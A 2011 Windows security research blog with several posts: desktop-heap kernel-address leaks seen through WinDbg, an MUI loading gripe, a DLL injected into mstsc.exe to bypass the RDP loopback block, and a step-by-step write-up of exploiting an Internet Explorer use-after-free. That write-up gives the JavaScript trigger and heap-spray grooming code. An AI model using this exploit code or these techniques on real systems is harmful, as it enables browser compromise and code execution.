sábado, 1 de outubro de 2011

Unpack me if you can

Profiting from Desktop heap information


Having followed all the late buzz about the Windows graphics and messaging subsystem kernel part, I decided to take a look at it to understand how it worked, and see if I could find anything interesting and useful. Inspired by Alex Ionescu online presentation, I dove into the realms of the desktop heap, and started to understand the richness of information available. This post is about a little game that shows some of the potential behind that data. The game I'm proposing here will be to run a packed application and, from user mode, try to get some critical information from that process without interfering with it. As passive and non-invasive as possible. Without calling the kernel and not touching the packed process in any way.

Note: As always, the full paper is available here

For the setting, I grabbed a notepad.exe executable from a XP machine and packed it with UPX.
If you want to know why I didn't use notepad.exe from Windows 7 read my last post: "MUI hell". I renamed notepad.exe to popo.exe as to avoid any confusion with names and I ran it. Running ProcExp afterwards, one can see that the popo.exe process has high entropy, so it is identified as packed images "purple".

Figure 1: Packed process

Next, as I needed another GUI process and I didn't want to lock explorer.exe, I run another notepad.exe. This time I used the one from Windows 7.

As a side note, I'm going to jump around between kernel and user debuggers. Please try to keep in mind that the kernel debugger is just used to validate some of the demonstration data.

Continuing, find a GUI process, :):


!process 0 0 notepad.exe
PROCESS 85cb7d40  SessionId: 1  Cid: 0a14    Peb: 7ffd4000  ParentCid: 0804
    DirBase: 1be3b000  ObjectTable: 998c05d0  HandleCount:  58.
    Image: notepad.exe

From that process, get a GUI thread.

!process
PROCESS 85cb7d40  SessionId: 1  Cid: 0a14    Peb: 7ffd4000  ParentCid: 0804
    DirBase: 1be3b000  ObjectTable: 998c05d0  HandleCount:  58.
    Image: notepad.exe
    VadRoot 84444c88 Vads 70 Clone 0 Private 1454. Modified 1084. Locked 0.

        THREAD 8458d838  Cid 0a14.0a1c  Teb: 7ffdf000 Win32Thread: ff9ba008 WAIT: (WrUserRequest) UserMode Non-Alertable
            84caaec8  SynchronizationEvent

.thread 8458d838 
Implicit thread is now 8458d838

k
  *** Stack trace for last set context - .thread/.cxr resets it
ChildEBP RetAddr 
96b4eb10 82c9ad75 nt!KiSwapContext+0x26
96b4eb48 82c99bd3 nt!KiSwapThread+0x266
96b4eb70 82c9388f nt!KiCommitThreadWait+0x1df
96b4ebe8 915296d6 nt!KeWaitForSingleObject+0x393
96b4ec44 915294e3 win32k!xxxRealSleepThread+0x1d7
96b4ec60 91526550 win32k!xxxSleepThread+0x2d
96b4ecb8 91529aa2 win32k!xxxRealInternalGetMessage+0x4b2
96b4ed1c 82c7487a win32k!NtUserGetMessage+0x3f
96b4ed1c 779c70c6 nt!KiFastCallEntry+0x12a
000ff998 76d7cde0 ntdll!KiIntSystemCall+0x6
000ff99c 76d7ce13 USER32!NtUserGetMessage+0xc
000ff9b8 0080148a USER32!GetMessageW+0x33
000ff9f8 008016ec notepad!WinMain+0xe6
000ffa88 77473c45 notepad!_initterm_e+0x1a1
000ffa94 779e37f5 kernel32!BaseThreadInitThunk+0xe
000ffad4 779e37c8 ntdll!__RtlUserThreadStart+0x70
000ffaec 00000000 ntdll!_RtlUserThreadStart+0x1b

Ok, now we need to get information from the desktop heap, where it's mapped.

!teb
TEB at 7ffdf000

dt nt!_TEB 7ffdf000 win*
   +0x040 Win32ThreadInfo : 0xff9ba008 Void
   +0x6cc Win32ClientInfo : [62] 0x20000188
   +0xf6c WinSockData : (null)

dt win32k!tagCLIENTINFO 0x7ffdf6cc
+0x000 CI_flags         : 0x20000188
   +0x018 pDeskInfo        : 0x01d00578 tagDESKTOPINFO
   +0x01c ulClientDelta    : 0xfcb00000
   +0x028 CallbackWnd      : _CALLBACKWND
   +0x03c pClientThreadInfo : 0x01d0fd68 tagCLIENTTHREADINFO
   +0x064 hKL              : 0x08160816 HKL__
   +0x068 CodePage         : 0x4e4
   +0x06a achDbcsCF        : [2]  ""
   +0x06c msgDbcsCB        : tagMSG
   +0x088 lpdwRegisteredClasses : 0x76dc90d4  -> 0x90


dt win32k!tagDESKTOPINFO 0x01d00578
   +0x000 pvDesktopBase    : 0xfe800000 Void
   +0x004 pvDesktopLimit   : 0xff400000 Void
   +0x008 spwnd            : 0xfe800618 tagWND
   +0x00c fsHooks          : 0x4000
   +0x010 aphkStart        : [16] (null)
   +0x050 spwndShell       : 0xfe8082c0 tagWND
   +0x054 ppiShellProcess  : 0xff9c9608 tagPROCESSINFO
   +0x058 spwndBkGnd       : 0xfe808508 tagWND
   +0x05c spwndTaskman     : 0xfe804428 tagWND
   +0x060 spwndProgman     : (null)
   +0x064 pvwplShellHook   : 0xff919638 VWPL
   +0x068 cntMBox          : 0n0
   +0x06c spwndGestureEngine : (null)
   +0x070 pvwplMessagePPHandler : (null)
   +0x074 fComposited      : 0y0
   +0x074 fIsDwmDesktop    : 0y1

!kvas 0xfe800000
kvas : Show region containing fe800000
### Start    End        Length (  MB)    Count Type   
000 fdc00000 ffbfffff  2400000 (  36)        8 SessionSpace

!ptelist 0xfe800000
ptelist : Using fe800000 as VA
VA       |PDE                                 |PTE                               
FE800000 |Hard Pfn=128E0 Attr=---DA--KWEV     |Hard Pfn=13FE1 Attr=---DA--KWEV

Here, we have the kernel address (0xfe800000) of an executable heap in 32 bits architecture.
According to the help from windbg: "Executable page. For platforms that do not support a hardware execute/noexecute bit, including many x86  systems, the E is always displayed.". Basically where NX is not present - Can anyone out there validate the executability of this heap on 0x64?
A kernel address that we got from user mode and a heap we can iterate and validate, also from user mode.
A heap we can fill with GUI objects. Shellcode anyone? Stack pivoting?
This heap is called the Desktop heap and is shared and mapped read only in the user mode region, between all processes that share the same desktop and session, independently of its integrity level.

!vad 84444c88
VAD     level      start      end    commit
85ccf578 ( 5)         10       1f         0 Mapped       READWRITE          Pagefile-backed section
...
8458f448 ( 1)        800      82f         4 Mapped  Exe  EXECUTE_WRITECOPY  \Windows\System32\notepad.exe
8518bb90 ( 5)        830     182f        41 Private      READWRITE        
85206270 ( 4)       1830     18f7         0 Mapped       READONLY           Pagefile-backed section
845ed280 ( 5)       1900     19de         0 Mapped       READONLY           Pagefile-backed section
84600e10 ( 3)       19e0     19ef         1 Private      READWRITE        
85935718 ( 5)       19f0     1aef       128 Private      NO_ACCESS        
85cb43e0 ( 4)       1af0     1bef       130 Private      NO_ACCESS        
845770c0 ( 2)       1bf0     1cf0         0 Mapped       READONLY           Pagefile-backed section
85220368 ( 4)       1d00     28ff         0 Mapped       READONLY           Pagefile-backed section
85e32560 ( 3)       2900     29ff         2 Private      NO_ACCESS        


Although this alone might get you interested in this portion of memory, I'm not going, in this post, to talk about the potential of using this heap on privilege escalation exploitation cases.
I'm going to focus only on tagCLS type objects and what we can do with the information they provide from a user mode perspective.

The tagCLS objects are created by the win32k module, specifically by the ClassAlloc function, that allocates them in the Desktop heap when called by InternalRegisterClassEx. This USER32 system call is invoked whenever the user32.dll counterpart, RegisterClassEx function, is used to register a window class (tagWNDCLASSEX).

typedef struct tagWNDCLASSEX {
  UINT      cbSize;
  UINT      style;
  WNDPROC   lpfnWndProc;
  int       cbClsExtra;
  int       cbWndExtra;
  HINSTANCE hInstance;
  HICON     hIcon;
  HCURSOR   hCursor;
  HBRUSH    hbrBackground;
  LPCTSTR   lpszMenuName;
  LPCTSTR   lpszClassName;
  HICON     hIconSm;
} WNDCLASSEX, *PWNDCLASSEX;

Let's see what the Desktop heap has for us, from user mode. To calculate its address we grab the pDeskInfo member from the TEB's Win32ClientInfo offset, and subtract the size of heap metadata (0x570). Having the heap's base address we can dump it now:

dt nt!_heap 0x01d00000
   +0x000 Entry            : _HEAP_ENTRY
   +0x008 SegmentSignature : 0xffeeffee
   +0x00c SegmentFlags     : 1
   +0x010 SegmentListEntry : _LIST_ENTRY [ 0xfe8000a8 - 0xfe8000a8 ]
   +0x018 Heap             : 0xfe800000 _HEAP
   +0x01c BaseAddress      : 0xfe800000 Void
   +0x020 NumberOfPages    : 0xc00
   +0x024 FirstEntry       : 0xfe800570 _HEAP_ENTRY
   +0x028 LastValidEntry   : 0xff400000 _HEAP_ENTRY
   +0x02c NumberOfUnCommittedPages : 0xbaa
   +0x030 NumberOfUnCommittedRanges : 1
   +0x034 SegmentAllocatorBackTraceIndex : 0
   +0x036 Reserved         : 0
   +0x038 UCRSegmentList   : _LIST_ENTRY [ 0xfe855ff0 - 0xfe855ff0 ]
   +0x064 Signature        : 0xeeffeeff
   +0x0a0 VirtualAllocdBlocks : _LIST_ENTRY [ 0xfe8000a0 - 0xfe8000a0 ]
   +0x0a8 SegmentList      : _LIST_ENTRY [ 0xfe800010 - 0xfe800010 ]
   +0x0b8 BlocksIndex      : 0xfe800138 Void
   +0x0c4 FreeLists        : _LIST_ENTRY [ 0xfe81ef70 - 0xfe8489b8 ]
   +0x0d0 CommitRoutine    : 0x91497343     long  win32k!UserCommitDesktopMemory+0
   +0x0d4 FrontEndHeap     : (null)
   +0x0d8 FrontHeapLockCount : 0
   +0x0da FrontEndHeapType : 0 ''
   +0x0dc Counters         : _HEAP_COUNTERS
   +0x130 TuningParameters : _HEAP_TUNING_PARAMETERS

All this information pertains to kernel mode, but we can easily determine an offset from the kernel mode values to user mode:

?0xfe800000-0x01d00000
Evaluate expression: -55574528 = fcb00000

As we know that the first chunk of memory for a heap allocation is a HEAP_ENTRY, notice that the tagDESKTOPINFO is the first entry of the heap:

?0xfe800570+@@(sizeof(nt!_heap_entry))
Evaluate expression: -25164424 = fe800578

?(fe800578&0000ffff)+01d00000
Evaluate expression: 30410104 = 01d00578

Knowing the offset between kernel mode and user mode mappings of the Desktop heap, we can adjust the kernel addresses found and rebase them to user mode addresses. Doing so allows us to iterate through the whole heap, chunk by chunk.

dt nt!_HEAP_ENTRY 01d00570
   +0x000 Size             : 0x10

?01d00570+0x10*8
Evaluate expression: 30410224 = 01d005f0

dt nt!_HEAP_ENTRY 01d005f0
   +0x000 Size             : 4

?01d005f0+0x4*8
Evaluate expression: 30410256 = 01d00610

dt nt!_HEAP_ENTRY 01d00610
   +0x000 Size             : 0x17

Etc. But I said we're going to hunt for tagCLS objects. Let's have a look at them. The size of a tagCLS structure is:

?@@(sizeof(win32k!tagCLS)+sizeof(nt!_heap_entry))
Evaluate expression: 100 = 00000064

But as 64 isn't a multiple of eight we need to round it up, giving:

?68/8
Evaluate expression: 13 = 0000000d

So we need to seek for heap entries of size 0xd.

Recapitulating, the first heap chunk is a tagDESKTOPINFO.

?@@(sizeof(win32k!tagDESKTOPINFO))
Evaluate expression: 120 = 00000078

?01d00578+0x78
Evaluate expression: 30410224 = 01d005f0

So, our first seekable element is at 01d005f0, which is validated by our previous manual heap walking.
Although I could loop through all the heap entries, like before, I just need to find a first valid tagCLS to validate data. Let's then search for hints on objects sized 0xd then:

s -w 01d005f0 l1000 d
01d006c8  000d 0001 0017 0c00 06d0 ff68 8001 8001  ..........h.....
01d00734  000d 0900 3323 3732 3936 fe00 0018 0001  ....#32769......
01d00800  000d 0001 0018 0c00 0808 ff68 c039 c039  ..........h.9.9.

dt nt!_HEAP_ENTRY 01d006c8 
   +0x000 Size             : 0xd
   +0x002 Flags            : 0x1 ''
   +0x003 SmallTagIndex    : 0 ''
   +0x000 SubSegmentCode   : 0x0001000d Void
   +0x004 PreviousSize     : 0x17

This seems a valid entry. Let's dump it as tagCLS:

dt win32k!tagCLS 01d006c8+8 
   +0x000 pclsNext         : 0xff6806d0 tagCLS
   +0x004 atomClassName    : 0x8001
   +0x006 atomNVClassName  : 0x8001
   +0x008 fnid             : 0x29d
   +0x00c rpdeskParent     : 0x8585d678 tagDESKTOP
   +0x010 pdce             : (null)
   +0x014 hTaskWow         : 0
   +0x016 CSF_flags        : 0x41
   +0x018 lpszClientAnsiMenuName : (null)
   +0x01c lpszClientUnicodeMenuName : (null)
   +0x020 spcpdFirst       : (null)
   +0x024 pclsBase         : 0xffb22758 tagCLS
   +0x028 pclsClone        : (null)
   +0x02c cWndReferenceCount : 0n1
   +0x030 style            : 8
   +0x034 lpfnWndProc      : 0x914fcd91     long  win32k!xxxDesktopWndProc+0
   +0x038 cbclsExtra       : 0n0
   +0x03c cbwndExtra       : 0n0
   +0x040 hModule          : 0x91460000 Void
   +0x044 spicn            : (null)
   +0x048 spcur            : 0xffb75608 tagCURSOR
   +0x04c hbrBackground    : 0x00000002 HBRUSH__
   +0x050 lpszMenuName     : (null)
   +0x054 lpszAnsiClassName : 0xfe800738  "#32769"
   +0x058 spicnSm          : (null)

This is what we need. Let's get the tagDESKTOP address and validate it. This time we’ll be using the kernel to verify its address, by grabbing Win32ThreadInfo member from the TEB.

dt win32k!tagTHREADINFO 0xff9ba008 rpdesk
   +0x0c8 rpdesk : 0x8585d678 tagDESKTOP

Yes, it is the same. Now, if we search for all occurrences of this tagDESKTOP address in the Desktop heap, subtract 0xc from the obtained address, we get a list of all tagCLS objects in the heap.

Note that if I were to do a program or script to do this, I'd register a tagWNDCLASSEX with a known lpfnWndProc       like 0xbadecafe, seek for this value to locate my tagCLS object and get my corresponding tagDESKTOP; then, iterate all the heap items grabbing those with the same desktop. But, as I'm using the debugger for the demo, it's easier and simpler to do it this way.

s -d 01d005f0 l1000000 0x8585d678
01d00624  8585d678 fe800618 00040000 82000100  x...............
01d006dc  8585d678 00000000 00410000 00000000  x.........A.....
01d00754  8585d678 fe800748 00040000 80000100  x...H...........
01d00814  8585d678 00000000 00410000 00000000  x.........A.....
01d0088c  8585d678 fe800880 00040000 80000100  x...............
01d0096c  8585d678 00000000 03410000 00000000  x.........A.....
01d009e4  8585d678 fe8009d8 00000000 00000000  x...............
01d00a2c  8585d678 fe800a20 00000000 00000000  x... ...........
01d00a54  8585d678 00000000 00410000 00000000  x.........A........

The most interesting parts of a tagCLS are lpfnWndProc and hModule because these are user mode addresses that we can use and validate from user mode.

.foreach (meuval {s -[1]d 01d005f0 l1000000 0x8585d678 } )  {
   .if ((poi(${meuval}-0x14)&0x0000ffff) >= 0000000d) {
      .printf "ObjAddr=[%08x], hInstance[%08x], WndProc=",
               poi(${meuval}+18),
               poi(${meuval}+34);
       dds (${meuval}+28) l1;
    }
 }

Note: The search size given in the command above is greater or equal to the size of tagCLS, because the kernel can reserve some extra space if requested by the user, as indicated in the cbclsExtra class member.

...
ObjAddr=[fe800ac0], hInstance[00800000], WndProc=01d00af4  008072c5 notepad!NpSaveDialogHookProc+0x97
ObjAddr=[fe800b58], hInstance[76d60000], WndProc=01d00b8c  76d70666 USER32!ImeWndProcW
ObjAddr=[fe800dd0], hInstance[77090000], WndProc=01d00e04  770941b5 MSCTF!UIWndProc
ObjAddr=[fe800e38], hInstance[77090000], WndProc=01d00e6c  770fdd77 MSCTF!UIComposition::CompWndProc
...
...
ObjAddr=[fe805228], hInstance[749f0000], WndProc=01d0525c  74a1fe38 COMCTL32!CListView::s_WndProc
ObjAddr=[fe805490], hInstance[749f0000], WndProc=01d054c4  74a16022 COMCTL32!Header_WndProc
...
ObjAddr=[fe807320], hInstance[01000000], WndProc=01d07354  01003429
...
ObjAddr=[fe814950], hInstance[70830000], WndProc=01d14984  708432bc
ObjAddr=[fe814ba8], hInstance[70830000], WndProc=01d14bdc  708431dc
ObjAddr=[fe814c40], hInstance[70830000], WndProc=01d14c74  70842954
...
ObjAddr=[fe82b580], hInstance[77820000], WndProc=01d2b5b4  778663e5 ole32!OleMainThreadWndProc
ObjAddr=[fe82cb70], hInstance[00800000], WndProc=01d2cba4  008014de notepad!NPWndProc
...
ObjAddr=[fe842790], hInstance[77090000], WndProc=01d427c4  770fdd77 MSCTF!UIComposition::CompWndProc
ObjAddr=[fe8428a8], hInstance[76d60000], WndProc=01d428dc  76db3f06 USER32!EditWndProcW
ObjAddr=[fe842910], hInstance[749f0000], WndProc=01d42944  749f99d0 COMCTL32!Edit_WndProc
ObjAddr=[fe842ac8], hInstance[749f0000], WndProc=01d42afc  74a90d49 COMCTL32!StatusWndProc
ObjAddr=[fe843c78], hInstance[01010000], WndProc=01d43cac  01044270

Dumping lpfnWndProc and hModule from all the tagCLS objects found in the desktop heap, we can observe that all the user windows message dispatch handlers registered in the system for the current desktop are available for analysis from user mode. From the dump above I've identified two from notepad: NpSaveDialogHookProc and NPWndProc which is the main window dispatcher function; and module 0x01000000. This entire post is about module 0x01000000.

Module 0x01000000 is popo.exe as can be seen from the procExp.

Figure 2: Packed popo.exe module address.


And the address from WndProc at memory position 0x1d07354, 0x01003429 is the NPWndProc windows message handler dispatcher function from popo.exe as seen in the figure. The figure shows the unpacked version of popo.exe so that symbol resolution is available.
 
 Figure 3: Window dispatcher registration.

Figure 4: Window dispatcher registration arguments.

So here you have it. A fine simple non-invasive way of getting some information from packed or protected applications.

Other thoughts: Do you think that the same info is available for Protected (Media Path) processes? Those to which we were not supposed to get any info about?
Is there any information available for other desktops windows if in the same session? Can we link this data in any way with the aheList?


Hope you enjoyed it.

quinta-feira, 22 de setembro de 2011

MUI hell

How hateful can (some times) Microsoft Windows be? Let me count the times.... Well, this one happened while I was doing some experiments with Notepad.exe. As I needed to modify the Notepad.exe binary and didn't want to mess with the installation, I copied it to a temporary folder. Changed the binary afterwards and tried to run it.
Hmmm... Nothing happened. Run it again, and again, and again.... Nothing was happening. So, I recopied it again, and tried to run it to see if the failure was caused by the patching. Nope. Again, nothing was happening. Run it again, and again, and again.... Nothing.

I decided to run Procmon on it, and surprise, surprise, a couple of things failed to be found, namely: the MUI files.


Copying the missing files from Windows "en" and "en-US" subdirectories to the temp dir, and maintaining the
directories structures, notepad finally executed.
Doing the same with Calc.exe, guess what?


Who's responsible for this? A stupid function exported from ntdll called LdrpLoadResourceFromAlternativeModule.
This function get called when Notepad.exe and Calc.exe tries to load resource strings from the binary.

Oh, and this seems to break UPX....

What the hell?

terça-feira, 20 de setembro de 2011

Inside Job (or give me a loop)

Let's pretend I'm a System Administrator (:)), and I've got to tweak some features and install some software in my client PC's and servers for end users and programmers usage.
I'm logged in as Administrator, so, some of the policies and configurations I'm pushing don't apply to my account.
I need to login as a test user with membership similar to my clients to verify if everything is working and in place. At the same time I'd like to keep my admin session open, so I can make some adjustments to the configuration.
If I'm logged into a workstation console and I try to open a different session as another user, I'm obliged to use the 'Fast user switching' service. But this locks my previous admin session. While still logged in into the computer's console, if I try to open an RDP connection to the machine, I get an error reporting that I'm already connected to the console of the local computer.

But, all this is possible as long as I use remote sessions from a Windows server product. This is to say that you can loopback thru RDP in Windows Server, meaning that something is diferent in its RDP implementation. Could it be that the client is different from the one in the Workstation product? I can't even see the remote console connection.

What is the logic of this? In Windows Professional Edition, this happens because of a Microsoft policy that allows only one console session at a time. But, as the server edition has a admin remote console mode shouldn't the same concept be applied to the workstation edition? Why can't I open a new RDP session thru local host, or loopback interface, while logged in the console?

I don't know.

Trying to understant the reasoning behind this limitation, I determined that the loopback blockage resides in the client and not in the server.
The key lies in a COM object provided by mstscax.dll.
I developed a PoC tool that demonstrates just this. The tool is a dll called gimmelooprdp.dll, available here, that you can inject into a mstsc.exe RDP client. Run the mstsc.exe, get it's PID, and use a dll injection tool to inject it to mstsc.exe process.



Afterwards you can proceed as usual. Set the machine local address in the Computer data field and press Connect. The tool only works in Windows XP sp2 (as Microsoft no longer offers support for it, I hope they don't get anoyed by this hack). So, you'll be able to establish the connection, but, as Windows XP Pro only allows one session at a time, your primary console session will be logged off. If you wish to proceed with two opened sessions in the Professional edition, it is indeed possible, but you'll have to 'explode' the sessions (see my previous post 'Exploding sessions').



The dll can be downloaded here.

quinta-feira, 1 de setembro de 2011

Diaries of vulnerability - take 2

Stage 1 exploit - Controlling EIP


A friend of mine referred that he wasn't able to run the original exploit published by d0c_s4vage on his machine. Another one pointed out that he didn't understand why the original exploit used a block size of 0xE0 for heap spraying, even though the object used-after-free was a CTreeNode sized 0x4C. I thought this was a good motivation for a post, so here it is.

Note: I'll make this post simpler than the first part, so I'll skip some explanations along the way and I'll leave the first point for another post as its analysis has some background checking that will be covered in the second point explanation and in this post.
Note 2: Again the pretty formatted paper is available here for download.

Let’s begin with a slight variation of the exploit, as so we can test it more conveniently:

<html>
   <body>
     <script language='javascript'>
       document.body.innerHTML += "<object align='right' width='1000'>TAG_1</object>";
       document.body.innerHTML += "<a style='float:left;'>TAG_3</a>A";
       document.body.innerHTML += "A";
       document.body.innerHTML += "<strong id='popo' style='font-size:1000pc; margin:auto -1000cm auto auto;' dir='ltr'></strong>";

       document.getElementById('popo').innerHTML = "Z";
    </script>
  </body>
</html>


And these breakpoints:

bp mshtml!CTreeNode::CTreeNode ".printf \" CTreeNode:node[%08x] Type:\",ecx;dds edi l1; gc;"
bp mshtml!CObjectElement::CObjectElement ".printf \" CObjectElement:addr[%08x] \\n\",esi;gc"


Let's review some history:

CObjectElement:addr[004150e8]
CTreeNode:node[0042adb0] Type:mshtml!CObjectElement::`vftable'
CTreeNode:node[0042b1d0] Type:mshtml!CAnchorElement::`vftable'
CTreeNode:node[0042b280] Type:mshtml!CPhraseElement::`vftable'
CTreeNode:node[0042adb0] Type:mshtml!CObjectElement::`vftable'
CTreeNode:node[0042b1d0] Type:mshtml!CAnchorElement::`vftable' 
... 
CTreeNode:node[0042ae60] Type:mshtml!CBodyElement::`vftable'
(b60.2e0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0042adb0 ecx=0041010a edx=00000000 esi=01ffbc20 edi=00000000

eip=6987b68f esp=01ffbbf4 ebp=01ffbc0c iopl=0 nv up ei pl zr na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mshtml!CElement::Doc+0x2:
6987b68f 8b5070 mov edx,dword ptr [eax+70h] ds:0023:00000070=????????
 

ub mshtml!CElement::Doc:
6987b68d 8b01 mov eax,dword ptr [ecx]


dc ebx

0042adb0 0041010a 00000000 ffff404a ffffffff ..A.....J@......


What we have here is, as we saw in the previous post, that EBX is a pointer to the CTreeNode freed object, and is being wrongly reused. So, why don’t we reuse the CTreeNode freed object and fill it with our controlled content? If ECX is the first value of the CTreeNode we could adjust its value so we could jump directly to our nop sled address. The problem is that between the free of the CTreeNode and its usage we have no chance of intervening in the execution path (by use of javascript). So we need to deal with the address left by the heap allocator. If ECX is the first value of the CTreeNode, according to reversed code it should be pointing to a CObjectElement but the value pointed by ECX has apparently no valid or known object address:

!heap -x 0041010a
Entry User Heap Segment Size PrevSize Unused Flags

-----------------------------------------------------

00410050 00410058 00370000 00410450 100 - 0 LFH;free

The reason for this is because EBX was freed. What happens when a user memory chunk is returned to the heap allocator (the LFH in this case), besides all the heap related metadata updated, is that the first WORD in the user portion of the allocation, gets a new purpose, it becomes the FreeEntryOffset:

*(WORD)(ChunkHeader + 8) = AggrExchg.FreeEntryOffset;

This explains the 0x010a, but what is the 0x0041? This value is the two MSB of the original value because the free process doesn’t update this WORD, so we know that the CObjectElement had a value of 0x0041xxxx, which corresponds to our freed CObjectElement in the trace: 0x004150e8.

LFH, as it tries to keep fragmentation to a minimum, uses a metadata structure called heap sub-segment, which organizes memory in contiguous chunks that keep track of allocated and freed memory blocks of the same size.
So a sub-segment is used to manage blocks of size 0x4C and another sub-segment manages the allocation and de-allocation of blocks of size 0xE0, explaining why two aligned in time allocations, CObjectElement:addr[004150e8] and CTreeNode:node[0042adb0] have so different addresses.

This simplistic view of the process is important to understand it, because it will allow us to influence the process, and more important, the values that we want stored in this first DWORD of the user buffer. I say first DWORD because we want to predictably set this to a usable or controllable pointer address.
How can we influence this, then?
As the first WORD is a FreeEntryOffset, and it's updated during a free of a CTreeNode we'll need to impose some determinism on CTreeNode allocations. How do we do this? We allocate sufficient objects of this size to fill potential holes in the sub-segment that manages 0x4C sized objects and at some point we'll start having contiguous objects allocation. The following code will do the trick:
... 
document.body.innerHTML += "<strong id='popo' style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'></strong>";
  var size = 0x4c; 
  var arrSize = 200;
  var obj_overwrite = unescape("%u0c0c%u0c0c"); 
  while(obj_overwrite.length < size) 
  { obj_overwrite += obj_overwrite; } 
  obj_overwrite = obj_overwrite.substr(0, (size-6)/2); 
  CollectGarbage(); 
  var arr = new Array(); 
  for(var counter = 0; counter < arrSize; counter++) 
  { arr.push(obj_overwrite.substr(0, obj_overwrite.length)); } 
  for(var counter = arrSize-50; counter < arrSize; counter+=3) 
  { delete arr[counter]; } 
  CollectGarbage(); 
  document.getElementById('popo').innerHTML = "Z"; 
...

 
After crashing we get this:

dc ebx ebx+0x4C
002d6318 002e00a7 00000000 ffff404a ffffffff ........J@......

002d6328 00000051 00000000 00000000 00000000 Q...............

002d6338 00000000 002d6340 00000062 00000000 ....@c-.b.......

002d6348 00000000 00000000 002d6328 00000000 ........(c-.....

002d6358 00000000 00000000 00000000 00000000 ................


dc ebx-8-0x4C ebx+0x4C+8+0x4C

002d62c4 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................

002d62d4 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................

002d62e4 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................

002d62f4 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................

002d6304 0c0c0c0c 00000c0c 00000000 3b93022c ............,..;

002d6314 80000000 002e00a7 00000000 ffff404a ............J@..

002d6324 ffffffff 00000051 00000000 00000000 ....Q...........

002d6334 00000000 00000000 002d6340 00000062 ........@c-.b...

002d6344 00000000 00000000 00000000 002d6328 ............(c-.

002d6354 00000000 00000000 00000000 00000000 ................

002d6364 00000000
3b930223 88000000 00000046 ....#..;....F...
002d6374 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................

002d6384 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................

002d6394 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................

002d63a4 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................

002d63b4 0c0c0c0c 00000c0c ........
 
As you can see, the before and after chunk´s content are controllable by us, filling those objects sized 0x4C with 0x0c0c0c0c. This gives us predictability where our chunk is allocated (relative offset) and the offset value that is written. But a problem remains, that will render useless our effort into controlling the first WORD of the pointer.

(6c0.4cc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7fd6d1eb ebx=0036a530 ecx=003800a7 edx=00000000 esi=0228bd10 edi=00000000
eip=6987b68f esp=0228bce4 ebp=0228bcfc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mshtml!CElement::Doc+0x2:
6987b68f 8b5070 mov edx,dword ptr [eax+70h] ds:0023:7fd6d25b=????????


dc ebx l1
0036a530 003800a7


!heap -x ebx

Entry User Heap Segment Size PrevSize Unused Flags

-------------------------------------------------------

0036a528 0036a530 002b0000 00347878 58 - 0 LFH;free


dt nt!_HEAP_SUBSEGMENT 00347878

ntdll!_HEAP_SUBSEGMENT
 
+0x000 LocalInfo : 0x002b6f70 _HEAP_LOCAL_SEGMENT_INFO 
+0x004 UserBlocks : 0x00369f40 _HEAP_USERDATA_HEADER 
+0x008 AggregateExchg : _INTERLOCK_SEQ 
+0x010 BlockSize : 0xb
...


dt nt!_HEAP_BUCKET_COUNTERS 0x002b6f70+50

ntdll!_HEAP_BUCKET_COUNTERS
 
+0x000 TotalBlocks : 0x12b 
+0x004 SubSegmentCounts : 7 
+0x000 Aggregate64 : 0n30064771371

TotalBlocks only reports 0x12b blocks, this means that we won’t have any offset recorded in the first WORD of the pointer beyond this value. Why? Because it is the sum of all chunks distributed by all 7 sub-segments (as indicated by SubSegmentCounts). Although we could push this value even upper, that would lead to an increase of heap allocations. So let’s say that the only thing we can predict from this is that it´s value will always be a multiple of 0xb (0x58/8) plus 2. We could also force the chunk to the end of the list of an heap sub-segment cache, setting the WORD value to 0xffff, but that would gain us nothing either, more on this later.

dt -a nt!_HEAP_SUBSEGMENT 0x002b6f70+8
ntdll!_HEAP_SUBSEGMENT

[0] @ 002b6f78

---------------------------------------------
 
+0x000 LocalInfo : 0x03c3e1c0 _HEAP_LOCAL_SEGMENT_INFO 
+0x004 UserBlocks : 0x03c3e1a0 _HEAP_USERDATA_HEADER
...

[1] @ 002b6f98

---------------------------------------------
 
+0x000 LocalInfo : 0x00347878 _HEAP_LOCAL_SEGMENT_INFO 
+0x004 UserBlocks : 0x002bdaf0 _HEAP_USERDATA_HEADER
...


Considering this, from this point on, I’ll diverge in the exploit code from the original one, because I want to improve the exploit by giving it more resilience, so keep reading. 

We know now that the value we're targeting in lies within the heap segment that manages chunks of size 0xE8 (where CObjectElement resides) and we can't control the last 4 bytes of the address. Or can we?
All that seems left for predictability at this point is to try to fill a heap sub-segment with strings sized 0xE8, and set the CObjectElement right in the middle or end of this string sprayed memory area, so that we can profit from its first WORD address. We need that the last CObjectElement created lands in a filled sub-segment and not in a new sub-segment, where there won't be any string content. So, being 0xffff the maximum block amount of a sub-segment, we can have, per sub-segment, a total of 2259 chunks of 0xe8 size.

?ffff*8/e8
Evaluate expression: 2259 = 000008d3

 
Say we allocate 2259 string objects of size 0xE8, the first WORD of the CTreeNode freed object will have a value between 0x2 and 0xffff; we might land our pointer anywhere between the full address range of the segment:

0xXXXX[0x2-0xffff]

But, if we force the usage of a caching sub-segment, the address range is heavily reduced, although we can’t preview what we’ll get as first WORD. Forcing the cache usage is as simple as allocating a large number of strings chunks sized 0xE8, and freeing a small number of the lastly allocated strings; the strings will fill up the cache and will be reused by the time the CObjectElement is created.
But what happens if, by any chance, we land in a point in time where the caches are empty? It will allocate the object from an active segment, and we’re back to the starting point, as can be seen from the following example trace:

CObjectElement:addr[028a4f80]
CTreeNode:node[00450080] Type:028a4f80 CObjectElement::`vftable'

eax=00450080 ebx=00457f70 ecx=00450080 edx=00000000 esi=0046f428 edi=028a4f80
